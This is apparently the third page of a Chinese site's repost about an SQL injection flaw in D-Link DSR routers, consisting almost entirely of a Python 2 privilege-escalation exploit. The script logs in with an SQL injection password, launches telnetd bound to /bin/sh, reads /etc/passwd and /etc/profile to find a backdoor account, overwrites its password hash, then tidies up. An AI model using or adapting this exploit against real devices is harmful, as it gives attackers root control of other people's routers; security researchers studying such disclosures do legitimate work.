Link DSR路由器系列产品SQL注入漏洞(CVE(3)


def restartTelnetd(mystr1 = None, mystr2 = None):
    assert mystr1 != None and mystr2 != None
    global pid
    pid = findPid("telnetd -l /bin/")
    if pid > 0:
        # Stopping the running telnetd
        print "[+] Stopping telnetd (" + str(pid) + "): ",
        sys.stdout.flush()
        (h, d) = execCmd("kill " + str(pid))
        pid = findPid(mystr1)
        if pid > 0:
            print "FAILURE"
            sys.exit(-1)
        else:
            print "OK"
    # Starting a new telnetd
    print "[+] Starting telnetd: ",
    sys.stdout.flush()
    (h, d) = execCmd("telnetd -l " + mystr2)
    pid = findPid("telnetd -l " + mystr2)
    if pid > 0:
        print "OK (" + str(pid) + ")"
    else:
        print "FAILURE"
        sys.exit(-1)
   

def main():
    global ipaddr, cookie, pid, bduser, bdpasswd
    user = "admin"
    passwd = "' or 'a'='a"
    print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)"
    print "This change is non-persistent to device reboots."
    print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n"
    # Logging into the router
    print "[+] Trying to log into the router: ",
    sys.stdout.flush()
    (h, d) = login(user, passwd)
    if d.find("User already logged in") > 0:
        print "FAILURE"
        print "[-] The user \"admin\" is still logged in. Please log out from your current session first."
        sys.exit(-1)
    elif d.find('<a href="https://www.linuxidc.com/?page=index.htm">Logout</a>') > 0:
        while h:
            (c1, c2) = h.pop()
            if c1 == 'set-cookie':
                cookie = c2
                break
        print "OK (" + cookie + ")"
    elif d.find("Invalid username or password") > 0:
        print "FAILURE"
        print "[-] Invalid username or password"
        sys.exit(-1)
    else:
        print "FAILURE"
        print "[-] Unable to login."
        sys.exit(-1)
       
    # Starting a telnetd with custom parameters
    print "[+] Preparing the hack..."
    restartTelnetd("/bin/login", "/bin/sh")
   
    # Do the h4cK
    print "[+] Hacking the router..."
    print "[+] Getting the backdoor user name: ",
    sys.stdout.flush()
    tn = telnetlib.Telnet(ipaddr.split(":")[0])
    tn.read_very_eager()
    tn.write("cat /etc/profile\n")
    time.sleep(5)
    data = tn.read_very_eager()
    for i in data.split("\n"):
        if i.find('"$USER"') > 0:
            bduser = i.split('"')[3]
            break
    if len(bduser) > 0:
        print "OK (" + bduser + ")"
    else:
        print "FAILURE"
        sys.exit(-1)
    print "[+] Setting the new password for " + bduser + ": ",
    sys.stdout.flush()
    tn.write("cat /etc/passwd\n")
    time.sleep(5)
    data = tn.read_very_eager()
    data = data.split("\n")
    data.reverse()
    data.pop()
    data.reverse()
    data.pop()
    data = "\n".join(data)
    for i in data.split("\n"):
        if i.find(bduser) >= 0:
            line = i.split(':')
            s1 = string.lowercase + string.uppercase + string.digits
            salt = ''.join(random.sample(s1,2))
            pw = crypt.crypt(bdpasswd, salt)
            line[1] = pw
            # doesn't work for some odd reason -- too lazy to find out why
            #salt = ''.join(random.sample(s1,8))
            #line[1] = crypt.crypt(bdpasswd, '$1$' + salt + '$')
            data = data.replace(i, ":".join(line))
            break
    tn.write('echo -en "" > /etc/passwd\n')
    time.sleep(5)
    for i in data.split("\n"):
        tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n')
        time.sleep(1)
    data = tn.read_very_eager()   
    tn.close()
    if data.find(pw) >= 0:
        print "OK (" + pw + ")"
        success = True
    else:
        print "FAILURE"
        print "[-] Could not set the new password."
        sys.exit(-1)
   
    # Switching back to the originals
    print "[+] Mobbing up..."
    restartTelnetd("/bin/sh", "/bin/login")
   
    # Logging out
    print "[+] Logging out: ",
    sys.stdout.flush()
    (h, d) = logout()
    if d.find('value="Login"') > 0:
        print "OK"
    else:
        print "FAILURE"
        print "[-] Unable to determine if user is logged out."

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/3c342957405f1cbdaf4c627af3cac79d.html